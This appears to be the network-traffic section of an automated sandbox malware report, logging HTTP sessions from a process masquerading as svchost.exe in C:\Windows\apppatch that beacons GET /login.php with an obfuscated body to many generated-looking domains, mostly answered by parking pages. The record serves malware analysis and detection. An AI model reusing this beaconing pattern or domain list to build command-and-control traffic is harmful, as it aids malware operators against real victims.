                                                                                                                                                                                                              date: Fri, 23 Aug 2024 16:47:38 GMT
                                                                                                                                                                                                              server: Apache
                                                                                                                                                                                                              set-cookie: __tad=1724431658.5024510; expires=Mon, 21-Aug-2034 16:47:38 GMT; Max-Age=315360000
                                                                                                                                                                                                              location: http://ww25.lyxynyx.com/login.php?subid1=20240824-0247-3858-b174-cdc5f33d229c
                                                                                                                                                                                                              content-length: 2
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                              Data Raw: 0a 0a
                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              27192.168.2.451130154.85.183.50806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.168504953 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyval.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.076988935 CEST307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:38 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 138
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              ETag: "663ee226-8a"
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.078131914 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyval.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.439879894 CEST307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:39 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 138
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              ETag: "663ee226-8a"
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              28192.168.2.45113164.190.63.136806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.754611969 CEST354OUTGET /login.php?sub1=20240824-0247-3846-ad61-5b1f45bc95f4 HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: ww16.vofycot.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: __tad=1724431658.5743798
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.540278912 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              date: Fri, 23 Aug 2024 16:47:39 GMT
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_vKxkoCTru8h+iIi5Tt3O5+PIpHGgmbGBtIa4qyOAFr7SWe06f17cSlq4oBZ8NMznfEtxup49PolcyFrAAupYNA==
                                                                                                                                                                                                              last-modified: Fri, 23 Aug 2024 16:47:39 GMT
                                                                                                                                                                                                              x-cache-miss-from: parking-89b87dbbb-688bm
                                                                                                                                                                                                              server: Parking/1.0
                                                                                                                                                                                                              Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 76 4b 78 6b 6f 43 54 72 75 38 68 2b 69 49 69 35 54 74 33 4f 35 2b 50 49 70 48 47 67 6d 62 47 42 74 49 61 34 71 79 4f 41 46 72 37 53 57 65 30 36 66 31 37 63 53 6c 71 34 6f 42 5a 38 4e 4d 7a 6e 66 45 74 78 75 70 34 39 50 6f 6c 63 79 46 72 41 41 75 70 59 4e 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_vKxkoCTru8h+iIi5Tt3O5+PIpHGgmbGBtIa4qyOAFr7SWe06f17cSlq4oBZ8NMznfEtxup49PolcyFrAAupYNA==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and best
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.540492058 CEST1236INData Raw: 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f
                                                                                                                                                                                                              Data Ascii: source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com h1062as it all. We hope you find what you are searching for!"><link rel="icon" type="im
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.540507078 CEST1236INData Raw: 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65
                                                                                                                                                                                                              Data Ascii: lay:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visib
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.541769028 CEST1236INData Raw: 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70
                                                                                                                                                                                                              Data Ascii: tton;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.anno
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.541780949 CEST1236INData Raw: 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72
                                                                                                                                                                                                              Data Ascii: -size:10px}.container-disclaimer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__conte
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.544677019 CEST1236INData Raw: 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e
                                                                                                                                                                                                              Data Ascii: gin-top:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.544689894 CEST1236INData Raw: 64 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 2d 73 6d
                                                                                                                                                                                                              Data Ascii: d-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-s
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.546359062 CEST1236INData Raw: 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32 65
                                                                                                                                                                                                              Data Ascii: ransform:translateX(26px);transform:translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.546371937 CEST1236INData Raw: 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 74 72 61
                                                                                                                                                                                                              Data Ascii: -moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.container-content--twot{min-hei
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.553246021 CEST1236INData Raw: 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 0d 0a 37 33 46 0d 0a 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a
                                                                                                                                                                                                              Data Ascii: e}.webarchive-block{text-align:center}.webarchive-block__73Fheader-link{color:#9fd801;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-lin
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.565778971 CEST1236INData Raw: 34 6f 42 5a 38 4e 4d 7a 6e 66 45 74 78 75 70 34 39 50 6f 6c 63 79 46 72 41 41 75 70 59 4e 41 3d 3d 22 2c 22 74 69 64 22 3a 22 33 30 39 37 22 2c 22 62 75 79 62 6f 78 22 3a 74 72 75 65 2c 22 62 75 79 62 6f 78 54 6f 70 69 63 22 3a 74 72 75 65 2c 22
                                                                                                                                                                                                              Data Ascii: 4oBZ8NMznfEtxup49PolcyFrAAupYNA==","tid":"3097","buybox":true,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbox":true,"noFollow":false,"slsh":false,"ppsh":true,"dnhlsh":true,"toSellUrl":"https://sedo.com/search/details/?partnerid


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              29192.168.2.451132199.59.243.226806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.257045031 CEST356OUTGET /login.php?subid1=20240824-0247-3858-b174-cdc5f33d229c HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: ww25.lyxynyx.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: __tad=1724431658.5024510
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.845093966 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              date: Fri, 23 Aug 2024 16:47:39 GMT
                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                              content-length: 1226
                                                                                                                                                                                                              x-request-id: 04d6d613-44be-4152-949e-6ee5c5794559
                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PZkF1bIkSBdTmq46NXSrZTjzChbIOJSzaQyqLTfJtzGyDMShbBnwDW61YfcO5ZXL/74o7aEERfsFmEpl7xDh1A==
                                                                                                                                                                                                              set-cookie: parking_session=04d6d613-44be-4152-949e-6ee5c5794559; expires=Fri, 23 Aug 2024 17:02:39 GMT; path=/
                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 5a 6b 46 31 62 49 6b 53 42 64 54 6d 71 34 36 4e 58 53 72 5a 54 6a 7a 43 68 62 49 4f 4a 53 7a 61 51 79 71 4c 54 66 4a 74 7a 47 79 44 4d 53 68 62 42 6e 77 44 57 36 31 59 66 63 4f 35 5a 58 4c 2f 37 34 6f 37 61 45 45 52 66 73 46 6d 45 70 6c 37 78 44 68 31 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PZkF1bIkSBdTmq46NXSrZTjzChbIOJSzaQyqLTfJtzGyDMShbBnwDW61YfcO5ZXL/74o7aEERfsFmEpl7xDh1A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.847008944 CEST867INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                              Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDRkNmQ2MTMtNDRiZS00MTUyLTk0OWUtNmVlNWM1Nzk0NTU5IiwicGFnZV90aW1lIjoxNzI0NDMxNjU5LCJwYWdlX3VybCI6I


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              30192.168.2.45074964.225.91.73806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.773272038 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qetyhyg.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.392220974 CEST816INHTTP/1.1 200 OK
                                                                                                                                                                                                              server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                              date: Fri, 23 Aug 2024 16:47:41 GMT
                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                              content-length: 593
                                                                                                                                                                                                              last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                              etag: "63f68860-251"
                                                                                                                                                                                                              accept-ranges: bytes
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              31192.168.2.45075072.52.179.174806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.009427071 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyhub.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              32192.168.2.45075172.52.179.174806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.617479086 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyhub.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              33192.168.2.46380352.34.198.229806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:46.496144056 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lygyvuj.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.291793108 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:47 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=230ba644e827e5eb69b76dd744835699|8.46.123.33|1724431667|1724431667|0|1|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              34192.168.2.46330844.221.84.10580
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.437999964 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gahyhiz.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:49.946039915 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:49 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
